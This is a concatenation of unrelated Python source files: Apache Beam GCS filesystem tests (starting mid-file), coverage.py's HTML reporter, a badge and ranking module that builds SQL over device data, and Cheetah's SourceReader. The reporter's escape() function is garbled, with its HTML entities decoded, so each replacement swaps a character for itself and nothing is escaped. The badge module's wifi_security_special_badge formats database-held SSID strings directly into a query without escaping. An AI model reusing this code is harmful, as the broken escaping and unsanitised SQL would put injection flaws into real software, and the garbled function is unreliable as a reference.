{'gs://bucket/file2': 2},
]
expected_results = [
[FileMetadata('gs://bucket/file1', 1)],
[FileMetadata('gs://bucket/file2', 2)]
]
result = self.fs.match(['gs://bucket/file1*', 'gs://bucket/file2*'])
self.assertEqual(
[mr.metadata_list for mr in result],
expected_results)
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_create(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
# Issue file copy
_ = self.fs.create('gs://bucket/from1', 'application/octet-stream')
gcsio_mock.open.assert_called_once_with(
'gs://bucket/from1', 'wb', mime_type='application/octet-stream')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_open(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
# Issue file copy
_ = self.fs.open('gs://bucket/from1', 'application/octet-stream')
gcsio_mock.open.assert_called_once_with(
'gs://bucket/from1', 'rb', mime_type='application/octet-stream')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_copy_file(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
sources = ['gs://bucket/from1']
destinations = ['gs://bucket/to1']
# Issue file copy
self.fs.copy(sources, destinations)
gcsio_mock.copy.assert_called_once_with(
'gs://bucket/from1', 'gs://bucket/to1')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_copy_file_error(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
sources = ['gs://bucket/from1']
destinations = ['gs://bucket/to1']
exception = IOError('Failed')
gcsio_mock.copy.side_effect = exception
# Issue batch rename.
expected_results = {(s, d):exception for s, d in zip(sources, destinations)}
# Issue batch copy.
with self.assertRaisesRegexp(BeamIOError,
r'^Copy operation failed') as error:
self.fs.copy(sources, destinations)
self.assertEqual(error.exception.exception_details, expected_results)
gcsio_mock.copy.assert_called_once_with(
'gs://bucket/from1', 'gs://bucket/to1')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_copy_tree(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
sources = ['gs://bucket1/']
destinations = ['gs://bucket2/']
# Issue directory copy
self.fs.copy(sources, destinations)
gcsio_mock.copytree.assert_called_once_with(
'gs://bucket1/', 'gs://bucket2/')
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_rename(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
sources = [
'gs://bucket/from1',
'gs://bucket/from2',
'gs://bucket/from3',
]
destinations = [
'gs://bucket/to1',
'gs://bucket/to2',
'gs://bucket/to3',
]
gcsio_mock.copy_batch.side_effect = [[
('gs://bucket/from1', 'gs://bucket/to1', None),
('gs://bucket/from2', 'gs://bucket/to2', None),
('gs://bucket/from3', 'gs://bucket/to3', None),
]]
gcsio_mock.delete_batch.side_effect = [[
('gs://bucket/from1', None),
('gs://bucket/from2', None),
('gs://bucket/from3', None),
]]
# Issue batch rename.
self.fs.rename(sources, destinations)
gcsio_mock.copy_batch.assert_called_once_with([
('gs://bucket/from1', 'gs://bucket/to1'),
('gs://bucket/from2', 'gs://bucket/to2'),
('gs://bucket/from3', 'gs://bucket/to3'),
])
gcsio_mock.delete_batch.assert_called_once_with([
'gs://bucket/from1',
'gs://bucket/from2',
'gs://bucket/from3',
])
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_rename_error(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
sources = [
'gs://bucket/from1',
'gs://bucket/from2',
'gs://bucket/from3',
]
destinations = [
'gs://bucket/to1',
'gs://bucket/to2',
'gs://bucket/to3',
]
exception = IOError('Failed')
gcsio_mock.delete_batch.side_effect = [[(f, exception) for f in sources]]
gcsio_mock.copy_batch.side_effect = [[
('gs://bucket/from1', 'gs://bucket/to1', None),
('gs://bucket/from2', 'gs://bucket/to2', None),
('gs://bucket/from3', 'gs://bucket/to3', None),
]]
# Issue batch rename.
expected_results = {(s, d):exception for s, d in zip(sources, destinations)}
# Issue batch rename.
with self.assertRaisesRegexp(BeamIOError,
r'^Rename operation failed') as error:
self.fs.rename(sources, destinations)
self.assertEqual(error.exception.exception_details, expected_results)
gcsio_mock.copy_batch.assert_called_once_with([
('gs://bucket/from1', 'gs://bucket/to1'),
('gs://bucket/from2', 'gs://bucket/to2'),
('gs://bucket/from3', 'gs://bucket/to3'),
])
gcsio_mock.delete_batch.assert_called_once_with([
'gs://bucket/from1',
'gs://bucket/from2',
'gs://bucket/from3',
])
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_delete(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
gcsio_mock.size.return_value = 0
files = [
'gs://bucket/from1',
'gs://bucket/from2',
'gs://bucket/from3',
]
# Issue batch delete.
self.fs.delete(files)
gcsio_mock.delete_batch.assert_called()
@mock.patch('apache_beam.io.gcp.gcsfilesystem.gcsio')
def test_delete_error(self, mock_gcsio):
# Prepare mocks.
gcsio_mock = mock.MagicMock()
gcsfilesystem.gcsio.GcsIO = lambda: gcsio_mock
exception = IOError('Failed')
gcsio_mock.delete_batch.side_effect = exception
gcsio_mock.size.return_value = 0
files = [
'gs://bucket/from1',
'gs://bucket/from2',
'gs://bucket/from3',
]
expected_results = {f:exception for f in files}
# Issue batch delete.
with self.assertRaisesRegexp(BeamIOError,
r'^Delete operation failed') as error:
self.fs.delete(files)
self.assertEqual(error.exception.exception_details, expected_results)
gcsio_mock.delete_batch.assert_called()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
|
"""HTML reporting for Coverage."""
import os, re, shutil, sys
import coverage
from coverage.backward import pickle
from coverage.misc import CoverageException, Hasher
from coverage.phystokens import source_token_lines, source_encoding
from coverage.report import Reporter
from coverage.results import Numbers
from coverage.templite import Templite
# Static files are looked for in a list of places.
STATIC_PATH = [
# The place Debian puts system Javascript libraries.
"/usr/share/javascript",
# Our htmlfiles directory.
os.path.join(os.path.dirname(__file__), "htmlfiles"),
]
def data_filename(fname, pkgdir=""):
"""Return the path to a data file of ours.
The file is searched for on `STATIC_PATH`, and the first place it's found,
is returned.
Each directory in `STATIC_PATH` is searched as-is, and also, if `pkgdir`
is provided, at that subdirectory.
"""
for static_dir in STATIC_PATH:
static_filename = os.path.join(static_dir, fname)
if os.path.exists(static_filename):
return static_filename
if pkgdir:
static_filename = os.path.join(static_dir, pkgdir, fname)
if os.path.exists(static_filename):
return static_filename
raise CoverageException("Couldn't find static file %r" % fname)
def data(fname):
"""Return the contents of a data file of ours."""
data_file = open(data_filename(fname))
try:
return data_file.read()
finally:
data_file.close()
class HtmlReporter(Reporter):
"""HTML reporting."""
# These files will be copied from the htmlfiles dir to the output dir.
STATIC_FILES = [
("style.css", ""),
("jquery.min.js", "jquery"),
("jquery.hotkeys.js", "jquery-hotkeys"),
("jquery.isonscreen.js", "jquery-isonscreen"),
("jquery.tablesorter.min.js", "jquery-tablesorter"),
("coverage_html.js", ""),
("keybd_closed.png", ""),
("keybd_open.png", ""),
]
def __init__(self, cov, config):
super(HtmlReporter, self).__init__(cov, config)
self.directory = None
self.template_globals = {
'escape': escape,
'title': self.config.html_title,
'__url__': coverage.__url__,
'__version__': coverage.__version__,
}
self.source_tmpl = Templite(
data("pyfile.html"), self.template_globals
)
self.coverage = cov
self.files = []
self.arcs = self.coverage.data.has_arcs()
self.status = HtmlStatus()
self.extra_css = None
self.totals = Numbers()
def report(self, morfs):
"""Generate an HTML report for `morfs`.
`morfs` is a list of modules or filenames.
"""
assert self.config.html_dir, "must give a directory for html reporting"
# Read the status data.
self.status.read(self.config.html_dir)
# Check that this run used the same settings as the last run.
m = Hasher()
m.update(self.config)
these_settings = m.digest()
if self.status.settings_hash() != these_settings:
self.status.reset()
self.status.set_settings_hash(these_settings)
# The user may have extra CSS they want copied.
if self.config.extra_css:
self.extra_css = os.path.basename(self.config.extra_css)
# Process all the files.
self.report_files(self.html_file, morfs, self.config.html_dir)
if not self.files:
raise CoverageException("No data to report.")
# Write the index file.
self.index_file()
self.make_local_static_report_files()
return self.totals.pc_covered
def make_local_static_report_files(self):
"""Make local instances of static files for HTML report."""
# The files we provide must always be copied.
for static, pkgdir in self.STATIC_FILES:
shutil.copyfile(
data_filename(static, pkgdir),
os.path.join(self.directory, static)
)
# The user may have extra CSS they want copied.
if self.extra_css:
shutil.copyfile(
self.config.extra_css,
os.path.join(self.directory, self.extra_css)
)
def write_html(self, fname, html):
"""Write `html` to `fname`, properly encoded."""
fout = open(fname, "wb")
try:
fout.write(html.encode('ascii', 'xmlcharrefreplace'))
finally:
fout.close()
def file_hash(self, source, cu):
"""Compute a hash that changes if the file needs to be re-reported."""
m = Hasher()
m.update(source)
self.coverage.data.add_to_hash(cu.filename, m)
return m.digest()
def html_file(self, cu, analysis):
"""Generate an HTML file for one source file."""
source_file = cu.source_file()
try:
source = source_file.read()
finally:
source_file.close()
# Find out if the file on disk is already correct.
flat_rootname = cu.flat_rootname()
this_hash = self.file_hash(source, cu)
that_hash = self.status.file_hash(flat_rootname)
if this_hash == that_hash:
# Nothing has changed to require the file to be reported again.
self.files.append(self.status.index_info(flat_rootname))
return
self.status.set_file_hash(flat_rootname, this_hash)
# If need be, determine the encoding of the source file. We use it
# later to properly write the HTML.
if sys.version_info < (3, 0):
encoding = source_encoding(source)
# Some UTF8 files have the dreaded UTF8 BOM. If so, junk it.
if encoding.startswith("utf-8") and source[:3] == "\xef\xbb\xbf":
source = source[3:]
encoding = "utf-8"
# Get the numbers for this file.
nums = analysis.numbers
if self.arcs:
missing_branch_arcs = analysis.missing_branch_arcs()
# These classes determine which lines are highlighted by default.
c_run = "run hide_run"
c_exc = "exc"
c_mis = "mis"
c_par = "par " + c_run
lines = []
for lineno, line in enumerate(source_token_lines(source)):
lineno += 1 # 1-based line numbers.
# Figure out how to mark this line.
line_class = []
annotate_html = ""
annotate_title = ""
if lineno in analysis.statements:
line_class.append("stm")
if lineno in analysis.excluded:
line_class.append(c_exc)
elif lineno in analysis.missing:
line_class.append(c_mis)
elif self.arcs and lineno in missing_branch_arcs:
line_class.append(c_par)
annlines = []
for b in missing_branch_arcs[lineno]:
if b < 0:
annlines.append("exit")
else:
annlines.append(str(b))
annotate_html = " ".join(annlines)
if len(annlines) > 1:
annotate_title = "no jumps to these line numbers"
elif len(annlines) == 1:
annotate_title = "no jump to this line number"
elif lineno in analysis.statements:
line_class.append(c_run)
# Build the HTML for the line
html = []
for tok_type, tok_text in line:
if tok_type == "ws":
html.append(escape(tok_text))
else:
tok_html = escape(tok_text) or ' '
html.append(
"<span class='%s'>%s</span>" % (tok_type, tok_html)
)
lines.append({
'html': ''.join(html),
'number': lineno,
'class': ' '.join(line_class) or "pln",
'annotate': annotate_html,
'annotate_title': annotate_title,
})
# Write the HTML page for this file.
html = spaceless(self.source_tmpl.render({
'c_exc': c_exc, 'c_mis': c_mis, 'c_par': c_par, 'c_run': c_run,
'arcs': self.arcs, 'extra_css': self.extra_css,
'cu': cu, 'nums': nums, 'lines': lines,
}))
if sys.version_info < (3, 0):
html = html.decode(encoding)
html_filename = flat_rootname + ".html"
html_path = os.path.join(self.directory, html_filename)
self.write_html(html_path, html)
# Save this file's information for the index file.
index_info = {
'nums': nums,
'html_filename': html_filename,
'name': cu.name,
}
self.files.append(index_info)
self.status.set_index_info(flat_rootname, index_info)
def index_file(self):
"""Write the index.html file for this report."""
index_tmpl = Templite(
data("index.html"), self.template_globals
)
self.totals = sum([f['nums'] for f in self.files])
html = index_tmpl.render({
'arcs': self.arcs,
'extra_css': self.extra_css,
'files': self.files,
'totals': self.totals,
})
if sys.version_info < (3, 0):
html = html.decode("utf-8")
self.write_html(
os.path.join(self.directory, "index.html"),
html
)
# Write the latest hashes for next time.
self.status.write(self.directory)
class HtmlStatus(object):
"""The status information we keep to support incremental reporting."""
STATUS_FILE = "status.dat"
STATUS_FORMAT = 1
def __init__(self):
self.reset()
def reset(self):
"""Initialize to empty."""
self.settings = ''
self.files = {}
def read(self, directory):
"""Read the last status in `directory`."""
usable = False
try:
status_file = os.path.join(directory, self.STATUS_FILE)
fstatus = open(status_file, "rb")
try:
status = pickle.load(fstatus)
finally:
fstatus.close()
except (IOError, ValueError):
usable = False
else:
usable = True
if status['format'] != self.STATUS_FORMAT:
usable = False
elif status['version'] != coverage.__version__:
usable = False
if usable:
self.files = status['files']
self.settings = status['settings']
else:
self.reset()
def write(self, directory):
"""Write the current status to `directory`."""
status_file = os.path.join(directory, self.STATUS_FILE)
status = {
'format': self.STATUS_FORMAT,
'version': coverage.__version__,
'settings': self.settings,
'files': self.files,
}
fout = open(status_file, "wb")
try:
pickle.dump(status, fout)
finally:
fout.close()
def settings_hash(self):
"""Get the hash of the coverage.py settings."""
return self.settings
def set_settings_hash(self, settings):
"""Set the hash of the coverage.py settings."""
self.settings = settings
def file_hash(self, fname):
"""Get the hash of `fname`'s contents."""
return self.files.get(fname, {}).get('hash', '')
def set_file_hash(self, fname, val):
"""Set the hash of `fname`'s contents."""
self.files.setdefault(fname, {})['hash'] = val
def index_info(self, fname):
"""Get the information for index.html for `fname`."""
return self.files.get(fname, {}).get('index', {})
def set_index_info(self, fname, info):
"""Set the information for index.html for `fname`."""
self.files.setdefault(fname, {})['index'] = info
# Helpers for templates and generating HTML
def escape(t):
"""HTML-escape the text in `t`."""
return (t
# Convert HTML special chars into HTML entities.
.replace("&", "&").replace("<", "<").replace(">", ">")
.replace("'", "'").replace('"', """)
# Convert runs of spaces: "......" -> " . . ."
.replace(" ", " ")
# To deal with odd-length runs, convert the final pair of spaces
# so that "....." -> " . ."
.replace(" ", " ")
)
def spaceless(html):
"""Squeeze out some annoying extra space from an HTML string.
Nicely-formatted templates mean lots of extra space in the result.
Get rid of some.
"""
html = re.sub(r">\s+<p ", ">\n<p ", html)
return html
|
|
import datetime
import easydict
import logging
import middleware
import time
from errors import UnknownAchievementHandler
@middleware.unsafe()
def count_based_badge(achievement_id, config, db, params):
logging.debug("count_based_badge @ {}/{}".format(params.device_id, achievement_id))
query = get_count_query(config.tables, "%(device_id)s") + ";"
return query_based_badge(query, config, db, params)
@middleware.unsafe()
def proc_based_badge(achievement_id, config, db, params):
logging.debug("proc_based_badge @ {}/{}".format(params.device_id, achievement_id))
numerator = get_count_query(config.tables, "%(device_id)s")
denominator = get_count_query(config.tables, None)
# Achievement unlocked: Triple nested SELECT
query = "SELECT {} / {} AS 'result';".format(numerator, denominator)
return query_based_badge(query, config, db, params)
@middleware.unsafe()
def wifi_security_special_badge(achievement_id, config, db, params):
logging.debug("wifi_security_special_badge @ {}/{}".format(params.device_id, achievement_id))
query = "SELECT DISTINCT ssid FROM {} WHERE device_id = %(device_id)s;"
db.execute(query.format(config.ssid_table), {"device_id": params.device_id})
ssids = ",".join(["'{}'".format(s["ssid"]) for s in db.fetchall()])
data = config.data_table
numerator = ("(SELECT count(*) FROM {} "
"WHERE device_id = %(device_id)s "
"AND ssid IN ({}) "
"AND security NOT LIKE '%%WPA%%')").format(data, ssids)
denominator = ("(SELECT count(*) FROM {} "
"WHERE device_id = %(device_id)s "
"AND ssid IN ({}))").format(data, ssids)
query = "SELECT 1 - {} / {} AS 'result';".format(numerator, denominator)
return query_based_badge(query, config, db, params)
@middleware.unsafe()
def wifi_funny_special_badge(achievement_id, config, db, params):
logging.debug("wifi_funny_special_badge @ {}/{}".format(params.device_id, achievement_id))
template = ("(SELECT count(*) FROM {} "
"WHERE device_id = %(device_id)s "
"AND ssid LIKE '%%{}%%')")
sub_queries = {k: template.format(config.table, k) for (k, _) in config.badges.items()}
sub_queries = ["{} AS '{}'".format(s, k) for k, s in sub_queries.items()]
query = "SELECT " + ", ".join(sub_queries) + ";"
db.execute(query, {'device_id': params.device_id})
return [{"badge": config.badges[k],
"value": k}
for k, c in db.fetchone().items()
if c > 0]
@middleware.unsafe()
def network_percent_data_badge(achievement_id, config, db, params):
logging.debug("network_percent_data_badge @ {}/{}".format(params.device_id, achievement_id))
query = ("SELECT sum(double_received_bytes) AS data_received, sum(double_sent_bytes) AS data_sent "
"FROM {} WHERE device_id = %(device_id)s".format(config.table))
db.execute(query + ";", {'device_id': params.device_id})
row = db.fetchone()
data_received = row['data_received']
data_sent = row['data_sent']
data_total = data_received + data_sent
result = None
if data_sent >= data_total * config.thresholds.sender:
result = {"badge": config.badges.sender,
"ratio": data_sent / data_total,
"threshold": config.thresholds.sender}
elif data_received >= data_total * config.thresholds.receiver:
result = {"badge": config.badges.receiver,
"ratio": data_received / data_total,
"threshold": config.thresholds.receiver}
return result
@middleware.unsafe()
def battery_mean_usage_badge(achievement_id, config, db, params):
logging.debug("battery_mean_usage_badge @ {}/{}".format(params.device_id, achievement_id))
charge_times_subquery = ("SELECT count(*) as charge_times "
"FROM {table} WHERE device_id = %(device_id)s "
"GROUP BY DATE(FROM_UNIXTIME(timestamp / 1000))").format(table=config.tables.charges)
discharge_level_subquery = ("SELECT avg(battery_start - battery_end) AS discharge_level "
"FROM {table} WHERE device_id = %(device_id)s "
"GROUP BY DATE(FROM_UNIXTIME(timestamp / 1000))").format(table=config.tables.discharges)
query_params = {'device_id': params.device_id}
db.execute("SELECT avg(charge_times) AS ct FROM ({}) AS t;".format(charge_times_subquery), query_params)
charge_times = db.fetchone()['ct']
db.execute("SELECT avg(discharge_level) AS dl FROM ({}) AS t;".format(discharge_level_subquery), query_params)
discharge_level = db.fetchone()['dl']
result = None
thresholds = config.thresholds
if charge_times <= thresholds.low.charge_times and discharge_level <= thresholds.low.discharge_level:
result = {'badge': config.badges.low}
elif charge_times >= thresholds.high.charge_times and discharge_level >= thresholds.high.discharge_level:
result = {'badge': config.badges.high}
return result
# Generic *_based_badge handler.
def query_based_badge(query, config, db, params):
db.execute(query, {'device_id': params.device_id})
count = db.fetchone()['result']
thresholds = config.thresholds
badges = config.badges
badge = None
next_badge_at = thresholds[0]
for (b, t) in zip(badges, thresholds):
if count >= t:
badge = b
else:
next_badge_at = t
break
if count >= thresholds[-1]:
next_badge_at = None
if badge is None:
return None
return {"badge": badge,
"value": count,
"next_badge_at": next_badge_at}
def get_count_query(tables, device_id):
template = "SELECT count(*) FROM {table}"
if device_id:
template = template + " WHERE device_id = {}".format(device_id)
sub_queries = ["(" + template.format(table=table) + ")" for table in tables]
return "(SELECT " + " + ".join(sub_queries) + " AS 'result')"
@middleware.unsafe()
def time_based_badge(achievement_id, config, db, params):
logging.debug("time_based_badge @ {}/{}".format(params.device_id, achievement_id))
query = get_time_query(config.tables, "%(device_id)s") + ";"
db.execute(query, {'device_id': params.device_id})
timestamp = db.fetchone()['timestamp'] / 1000 # It's a kind of magic
now = datetime.datetime.now() # TODO now() or utcnow()
timedelta = now - datetime.datetime.fromtimestamp(timestamp) # TODO fromtimestamp(t) or fromutctimestamp(t)
thresholds = config.thresholds
badges = config.badges
for (b, t) in zip(badges, thresholds):
if timedelta >= t:
badge = b
else:
next_badge_at = (now - timedelta + t).timestamp()
break
if timedelta >= thresholds[-1]:
next_badge_at = None
return {"badge": badge,
"value": timestamp,
"next_badge_at": next_badge_at}
def get_time_query(tables, device_id):
template = "SELECT timestamp FROM {table}"
if device_id:
template = template + " WHERE device_id={}".format(device_id)
template = template + " ORDER BY timestamp ASC LIMIT 1"
sub_queries = ["(" + template.format(table=table) + ")" for table in tables]
return "SELECT min(timestamp) as timestamp from (" + " UNION ALL ".join(sub_queries) + ") as t"
@middleware.unsafe()
def count_based_place(achievement_id, config, db, params):
device_id = params.device_id
logging.debug("count_based_place @ {}/{}".format(device_id, achievement_id))
return index_of(count_based_ranking(achievement_id, config, db, params), device_id)
@middleware.unsafe()
def proc_based_place(achievement_id, config, db, params):
device_id = params.device_id
logging.debug("proc_based_place @ {}/{}".format(device_id, achievement_id))
return index_of(proc_based_ranking(achievement_id, config, db, params), device_id)
@middleware.unsafe()
def time_based_place(achievement_id, config, db, params):
device_id = params.device_id
logging.debug("time_based_place @ {}/{}".format(device_id, achievement_id))
return index_of(time_based_ranking(achievement_id, config, db, params), device_id)
def index_of(l, key):
for i, u in enumerate(l):
if u["device_id"] == key:
u["rank"] = i
return u
return None
@middleware.unsafe()
def count_based_ranking(achievement_id, config, db, params):
logging.debug("count_based_ranking @ {}".format(achievement_id))
return get_counts(db, config.tables, params)
@middleware.unsafe()
def proc_based_ranking(achievement_id, config, db, params):
logging.debug("proc_based_ranking @ {}".format(achievement_id))
counts = get_counts(db, config.tables, params)
sum = 0
for c in counts:
sum += c["value"]
for c in counts:
c["value"] = c["value"] / sum
return counts
def get_counts(db, tables, params):
def merge(x, y):
for (k, v) in y.items():
if k in x:
x[k] = x[k] + v
else:
x[k] = v
return x
query = ("SELECT device_id, count(*) AS 'value' FROM {} "
"WHERE timestamp >= %(from)s AND timestamp <= %(to)s "
"GROUP BY device_id;")
ranking = {}
for table in tables:
db.execute(query.format(table), build_time_range(params["from"], params["to"]))
counts = {record["device_id"]: record["value"] for record in db.fetchall()} # Might need a cursor
ranking = merge(ranking, counts)
keys = sorted(ranking, key=lambda k: ranking[k], reverse=True)
return [{"device_id": k, "value": ranking[k]} for k in keys]
@middleware.unsafe()
def time_based_ranking(achievement_id, config, db, params):
def dict_for(d, device_id):
return {"device_id": device_id,
"value": d[device_id]}
logging.debug("time_based_ranking @ {}".format(achievement_id))
tables = config.tables
template = "SELECT device_id, min(timestamp) as timestamp FROM {} GROUP BY device_id"
subqueries = "UNION ALL ".join(["(" + template.format(table) + ")" for table in tables])
query = "SELECT device_id, min(timestamp) as timestamp FROM (" + subqueries + ") as t GROUP BY device_id"
db.execute(query)
d = {record["device_id"]: record["timestamp"] for record in db.fetchall()}
return [dict_for(d, device_id) for device_id in sorted(d, key=lambda k: d[k])]
def build_time_range(frm, to):
return {"from": frm or "0",
"to": to or str(int(time.time()) * 1000)} # NOTE Aware stores timestamps in unixtime millis
def dummy_handler(achievement_id, config, db, params):
logging.debug("Implement me! :(")
return None
# Handler dispatch:
def dispatch(handlers, config, achievement_id, db, params={}):
result = {}
for k, (h, c) in config.items():
if h in handlers:
result[k] = handlers[h](achievement_id, c, db, easydict.EasyDict(params))
else:
raise UnknownAchievementHandler(h)
return result
# Handler initialization
ranking_handlers = {
"count_based": count_based_ranking,
"procent_based": proc_based_ranking,
"time_based": time_based_ranking,
"wifi_security_special": dummy_handler,
"wifi_funny_special": dummy_handler,
"network_percent_data": dummy_handler,
"battery_mean_usage": dummy_handler
}
user_achievement_handlers = {
"count_based": count_based_badge,
"procent_based": proc_based_badge,
"time_based": time_based_badge,
"wifi_security_special": wifi_security_special_badge,
"wifi_funny_special": wifi_funny_special_badge,
"network_percent_data": network_percent_data_badge,
"battery_mean_usage": battery_mean_usage_badge
}
user_ranking_handlers = {
"count_based": count_based_place,
"procent_based": proc_based_place,
"time_based": time_based_place,
"wifi_security_special": dummy_handler,
"wifi_funny_special": dummy_handler,
"network_percent_data": dummy_handler,
"battery_mean_usage": dummy_handler
}
handlers = easydict.EasyDict({})
handlers.ranking = ranking_handlers
handlers.user = {}
handlers.user.achievements = user_achievement_handlers
handlers.user.ranking = user_ranking_handlers
|
|
#!/usr/bin/env python
# $Id: SourceReader.py,v 1.1 2006-09-06 09:50:09 skyostil Exp $
"""SourceReader class for Cheetah's Parser and CodeGenerator
Meta-Data
================================================================================
Author: Tavis Rudd <tavis@damnsimple.com>
License: This software is released for unlimited distribution under the
terms of the MIT license. See the LICENSE file.
Version: $Revision: 1.1 $
Start Date: 2001/09/19
Last Revision Date: $Date: 2006-09-06 09:50:09 $
"""
__author__ = "Tavis Rudd <tavis@damnsimple.com>"
__revision__ = "$Revision: 1.1 $"[11:-2]
import re
import sys
EOLre = re.compile(r'[ \f\t]*(?:\r\n|\r|\n)')
EOLZre = re.compile(r'(?:\r\n|\r|\n|\Z)')
ENCODINGsearch = re.compile("coding[=:]\s*([-\w.]+)").search
class Error(Exception):
pass
class SourceReader:
def __init__(self, src, filename=None, breakPoint=None, encoding=None):
## @@TR 2005-01-17: the following comes from a patch Terrel Shumway
## contributed to add unicode support to the reading of Cheetah source
## files with dynamically compiled templates. All the existing unit
## tests pass but, it needs more testing and some test cases of its
## own. My instinct is to move this up into the code that passes in the
## src string rather than leaving it here. As implemented here it
## forces all src strings to unicode, which IMO is not what we want.
# if encoding is None:
# # peek at the encoding in the first two lines
# m = EOLZre.search(src)
# pos = m.end()
# if pos<len(src):
# m = EOLZre.search(src,pos)
# pos = m.end()
# m = ENCODINGsearch(src,0,pos)
# if m:
# encoding = m.group(1)
# else:
# encoding = sys.getfilesystemencoding()
# self._encoding = encoding
# if type(src) is not unicode:
# src = src.decode(encoding)
## end of Terrel's patch
self._src = src
self._filename = filename
self._srcLen = len(src)
if breakPoint == None:
self._breakPoint = self._srcLen
else:
self.setBreakPoint(breakPoint)
self._pos = 0
self._bookmarks = {}
self._posTobookmarkMap = {}
## collect some meta-information
self._EOLs = []
pos = 0
while pos < len(self):
EOLmatch = EOLZre.search(src, pos)
self._EOLs.append(EOLmatch.start())
pos = EOLmatch.end()
self._BOLs = []
for pos in self._EOLs:
BOLpos = self.findBOL(pos)
self._BOLs.append(BOLpos)
def src(self):
return self._src
def filename(self):
return self._filename
def __len__(self):
return self._breakPoint
def __getitem__(self, i):
self.checkPos(i)
return self._src[i]
def __getslice__(self, i, j):
i = max(i, 0); j = max(j, 0)
return self._src[i:j]
def splitlines(self):
if not hasattr(self, '_srcLines'):
self._srcLines = self._src.splitlines()
return self._srcLines
def lineNum(self, pos=None):
if pos == None:
pos = self._pos
for i in range(len(self._BOLs)):
if pos >= self._BOLs[i] and pos <= self._EOLs[i]:
return i
def getRowCol(self, pos=None):
if pos == None:
pos = self._pos
lineNum = self.lineNum(pos)
BOL, EOL = self._BOLs[lineNum], self._EOLs[lineNum]
return lineNum+1, pos-BOL+1
def getRowColLine(self, pos=None):
if pos == None:
pos = self._pos
row, col = self.getRowCol(pos)
return row, col, self.splitlines()[row-1]
def getLine(self, pos):
if pos == None:
pos = self._pos
lineNum = self.lineNum(pos)
return self.splitlines()[lineNum]
def pos(self):
return self._pos
def setPos(self, pos):
self.checkPos(pos)
self._pos = pos
def validPos(self, pos):
return pos <= self._breakPoint and pos >=0
def checkPos(self, pos):
if not pos <= self._breakPoint:
raise Error("pos (" + str(pos) + ") is invalid: beyond the stream's end (" +
str(self._breakPoint-1) + ")" )
elif not pos >=0:
raise Error("pos (" + str(pos) + ") is invalid: less than 0" )
def breakPoint(self):
return self._breakPoint
def setBreakPoint(self, pos):
if pos > self._srcLen:
raise Error("New breakpoint (" + str(pos) +
") is invalid: beyond the end of stream's source string (" +
str(self._srcLen) + ")" )
elif not pos >= 0:
raise Error("New breakpoint (" + str(pos) + ") is invalid: less than 0" )
self._breakPoint = pos
def setBookmark(self, name):
self._bookmarks[name] = self._pos
self._posTobookmarkMap[self._pos] = name
def hasBookmark(self, name):
return self._bookmarks.has_key(name)
def gotoBookmark(self, name):
if not self.hasBookmark(name):
raise Error("Invalid bookmark (" + name + ', '+
str(pos) + ") is invalid: does not exist" )
pos = self._bookmarks[name]
if not self.validPos(pos):
raise Error("Invalid bookmark (" + name + ', '+
str(pos) + ") is invalid: pos is out of range" )
self._pos = pos
def atEnd(self):
return self._pos >= self._breakPoint
def atStart(self):
return self._pos == 0
def peek(self, offset=0):
self.checkPos(self._pos+offset)
pos = self._pos + offset
return self._src[pos]
def getc(self):
pos = self._pos
if self.validPos(pos+1):
self._pos += 1
return self._src[pos]
def ungetc(self, c=None):
if not self.atStart():
raise Error('Already at beginning of stream')
self._pos -= 1
if not c==None:
self._src[self._pos] = c
def advance(self, offset=1):
self.checkPos(self._pos + offset)
self._pos += offset
def rev(self, offset=1):
self.checkPos(self._pos - offset)
self._pos -= offset
def read(self, offset):
self.checkPos(self._pos + offset)
start = self._pos
self._pos += offset
return self._src[start:self._pos]
def readTo(self, to, start=None):
self.checkPos(to)
if start == None:
start = self._pos
self._pos = to
return self._src[start:to]
def readToEOL(self, start=None, gobble=True):
EOLmatch = EOLZre.search(self.src(), self.pos())
if gobble:
pos = EOLmatch.end()
else:
pos = EOLmatch.start()
return self.readTo(to=pos, start=start)
def find(self, it, pos=None):
if pos == None:
pos = self._pos
return self._src.find(it, pos )
def startswith(self, it, pos=None):
if self.find(it, pos) == self.pos():
return True
else:
return False
def rfind(self, it, pos):
if pos == None:
pos = self._pos
return self._src.rfind(it, pos)
def findBOL(self, pos=None):
if pos == None:
pos = self._pos
src = self.src()
return max(src.rfind('\n',0,pos)+1, src.rfind('\r',0,pos)+1, 0)
def findEOL(self, pos=None, gobble=False):
if pos == None:
pos = self._pos
match = EOLZre.search(self.src(), pos)
if gobble:
return match.end()
else:
return match.start()
def isLineClearToPos(self, pos=None):
if pos == None:
pos = self.pos()
self.checkPos(pos)
src = self.src()
BOL = self.findBOL()
return BOL == pos or src[BOL:pos].isspace()
def matches(self, strOrRE):
if isinstance(strOrRE, (str, unicode)):
return self.startswith(strOrRE, pos=self.pos())
else: # assume an re object
return strOrRE.match(self.src(), self.pos())
def matchWhiteSpace(self, WSchars=' \f\t'):
return (not self.atEnd()) and self.peek() in WSchars
